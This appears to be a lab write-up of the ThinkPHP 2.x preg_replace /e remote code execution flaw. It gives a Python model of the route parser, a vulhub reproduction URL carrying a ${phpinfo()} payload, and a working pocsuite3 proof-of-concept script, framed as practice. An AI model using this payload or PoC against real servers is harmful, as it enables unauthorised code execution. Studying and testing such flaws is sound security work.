ThinkPHP 2.x arbitrary code execution
1. Vulnerability overview
ThinkPHP 2.x matches routes with preg_replace in /e mode:
$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
With the /e modifier, preg_replace substitutes the capture groups into the replacement string and then evaluates the result as PHP code. The second capture group, a user-controlled route value, lands inside a double-quoted string literal, and PHP interpolates expressions such as ${...} inside double quotes, so a route value like ${phpinfo()} is executed rather than stored as text. The result is arbitrary code execution.
ThinkPHP 3.0 is affected as well, because the issue was not fixed in its Lite mode.
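To make the mechanism concrete, the following Python model of the route parser is an added example; it is not ThinkPHP's code and not part of the original post. It applies the same regular expression with $depr assumed to be "/", reconstructs the PHP statements that the /e replacement template would hand to eval for each match, flags route values that PHP would interpolate inside a double-quoted string, and contrasts that with a parser that stores the captured value as data instead of generating PHP source. The sample path is constructed for the example.

```python
import re

# Route separator; ThinkPHP's $depr is assumed to be "/" for this example.
DEPR = "/"

# Same pattern as the quoted preg_replace call with $depr = "/", minus the /e
# modifier (the evaluation step is modelled by generated_php_code below).
# The "\/" inside the character class is redundant with "/" but kept for fidelity.
ROUTE_RE = re.compile(r"(\w+)" + DEPR + r"([^" + DEPR + r"\/]+)")

# Replacement template from the vulnerable call: $var['\1']="\2";
# Under /e, PHP substitutes the capture groups into it and evals the result.
REPLACEMENT_TEMPLATE = "$var['{key}']=\"{value}\";"

# PHP interpolates ${expr} and {$expr} inside double-quoted strings, so any
# route value containing either form is evaluated rather than stored as text.
PHP_INTERPOLATION_RE = re.compile(r"\$\{[^}]*\}|\{\$[^}]*\}")


def generated_php_code(path):
    """Return the PHP statements preg_replace(/e) would eval for this path.

    Each match of ROUTE_RE yields one statement, with the second capture
    group dropped verbatim inside a double-quoted string literal.
    """
    return [REPLACEMENT_TEMPLATE.format(key=k, value=v)
            for k, v in ROUTE_RE.findall(path)]


def is_dangerous_value(value):
    """True when PHP would interpolate (and so execute) this route value."""
    return PHP_INTERPOLATION_RE.search(value) is not None


def dangerous_statements(path):
    """Subset of generated_php_code whose value triggers interpolation."""
    return [REPLACEMENT_TEMPLATE.format(key=k, value=v)
            for k, v in ROUTE_RE.findall(path) if is_dangerous_value(v)]


def parse_route_safely(path):
    """Hardened equivalent: same regex, but captures become dict entries.

    No PHP source is generated, so ${phpinfo()} stays an inert string.
    """
    return {k: v for k, v in ROUTE_RE.findall(path)}


if __name__ == "__main__":
    # Constructed sample path, the same one used in the reproduction step.
    sample = "index/index/name/${phpinfo()}"
    risky = dangerous_statements(sample)
    for stmt in generated_php_code(sample):
        print(stmt + ("  <-- interpolated, phpinfo() runs" if stmt in risky else ""))
    print(parse_route_safely(sample))
```

Running the script shows that `index/index` becomes a harmless assignment while `name/${phpinfo()}` becomes `$var['name']="${phpinfo()}";`, which PHP evaluates; the safe parser keeps the identical regex and simply never turns the captured data into code.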
2. Environment setup
Run docker-compose up -d in /vulhub/thinkphp/2-rce.
Once the environment is up, browse to http://192.168.1.142:8080/index.php to see the default page.
3. Reproduction
Request http://192.168.1.142:8080/index.php?s=/index/index/name/${phpinfo()} directly; the response contains the phpinfo() output, confirming that the route value was executed.
POC
from pocsuite3.api import Output, POCBase, register_poc, requests, logger


class DemoPOC(POCBase):
    vulID = ''
    version = '1'
    author = 'wcs'
    vulDate = '2022-04-16'
    createDate = '2022-04-16'
    updateDate = '2022-04-16'
    references = []
    name = 'ThinkPHP 2-rce arbitrary code execution vulnerability'
    appPowerLink = ''
    appName = ''
    appVersion = ''
    vulType = 'Arbitrary code execution'
    desc = '''
        Practice exercise for pocsuite
    '''
    samples = []
    install_requires = []

    def _verify(self):
        output = Output(self)
        result = {}  # verification result
        # The route value ${phpinfo()} is interpolated inside the double-quoted
        # string that the /e replacement evaluates, so phpinfo() runs server-side.
        payload = "/index.php?s=/index/index/name/${phpinfo()}"
        url = self.url
        try:
            resq = requests.get(url + payload)
            # phpinfo() output always carries the "PHP Version" heading
            if resq and resq.status_code == 200 and "PHP Version" in resq.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Name'] = payload
        except Exception as e:
            logger.warning('request to %s failed: %s' % (url, e))
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        # No separate exploitation step; reuse the verification logic.
        return self._verify()


register_poc(DemoPOC)
This POC was mainly for my own practice with pocsuite, so I used a ready-made target, and the verification code is fairly simple.